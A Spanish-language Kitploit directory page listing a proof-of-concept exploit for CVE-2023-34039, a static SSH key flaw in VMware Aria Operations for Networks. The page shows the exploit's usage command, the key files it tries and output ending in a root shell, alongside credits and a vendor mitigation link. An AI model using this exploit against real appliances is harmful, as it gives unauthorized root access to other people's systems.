Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-34039 — CVE-2023-34039 | Kitploit
Herramientas/GitHubGitHub/syedhafiz1234/cve-2023-34039
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad en la NubeHerramienta de Acceso Remoto
GitHubsyedhafiz1234/cve-2023-34039

CVE-2023-34039

CVE-2023-34039

Ver Repositorio
11hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-34039

POC para CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) RCE por clave SSH estática

Análisis técnico

Puede encontrar un análisis de causa raíz de la vulnerabilidad en mi blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

poc

Resumen

VMWare Aria Operations for Networks (vRealize Network Insight) desde la versión 6.0 hasta la 6.10 no regeneraba las claves ssh para los usuarios support y ubuntu, lo que permitía a un atacante con acceso SSH obtener acceso a un shell root de este producto.

Este problema fue reportado a VMWare por Harsh Jaiswal (@rootxharsh) y Rahul Maini (@iamnoooob) en ProjectDiscovery Research

Simplemente escribí el exploit, si se le puede llamar así, porque básicamente es un envoltorio de comandos ssh.

Uso

root@kitploit:~
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones del Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0018.html
Descargar herramienta